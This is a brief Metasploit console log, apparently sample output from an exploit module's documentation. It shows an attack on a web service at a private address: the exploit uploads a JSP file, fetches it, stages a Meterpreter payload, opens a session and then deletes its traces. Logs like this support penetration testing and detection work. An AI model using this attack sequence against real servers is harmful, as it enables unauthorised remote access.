[*] Started bind handler
[*] 172.16.218.152:8080 - created file at http://172.16.218.152:8080/WgcrY0.jsp
[*] 172.16.218.152:8080 - Waiting 10 seconds...
[*] 172.16.218.152:8080 - Accessing http://172.16.218.152:8080/WgcrY0.jsp
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1228800 bytes) to 172.16.218.152
[*] Meterpreter session 4 opened (172.16.218.1:65064 -> 172.16.218.152:4444) at 2014-04-29 03:46:39 +0200
[+] Deleted 6ZqRUs
[+] Deleted WgcrY0.jsp

meterpreter > quit
[*] Shutting down Meterpreter...

[*] 172.16.218.152 - Meterpreter session 4 closed.  Reason: User exit
```
